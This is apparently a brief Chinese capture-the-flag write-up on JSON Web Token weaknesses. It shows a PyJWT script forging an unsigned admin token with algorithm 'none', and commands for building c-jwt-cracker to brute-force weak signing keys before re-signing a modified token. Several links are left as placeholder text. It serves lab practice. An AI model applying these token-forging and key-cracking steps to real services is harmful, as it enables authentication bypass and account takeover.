JSON Web Token
关于JWT,下面是一些资料
添加链接描述
添加链接描述
简单来说,就是身份验证的payload
敏感信息泄露
1.随便登录一个账号后再网页工具的“网络”查看token
2.解密
添加链接描述
3.将上面和下面拼成flag值就行
无签名
1.在pycharm中加入pyjwt库,下面是安装教程
添加链接描述
2.运行以下脚本
import jwt
payload={
"username": "admin",
"password": "admin",
"role": "admin"
}
token = jwt.encode(payload,algorithm="none",key="")
print(token)
3.得到payload后,登录,抓包,修改token即可
弱密钥
1.安装工具
网站如下
添加链接描述
命令如下
apt-get install libssl-dev (1)
git clone https://github.com/brendan-rius/c-jwt-cracker (2)
make (3)
./jwtcrack +登录获取的token (4)
得到密钥
2.对原本的token进行修改,再重新加密
3.再登陆一次,替换token即可
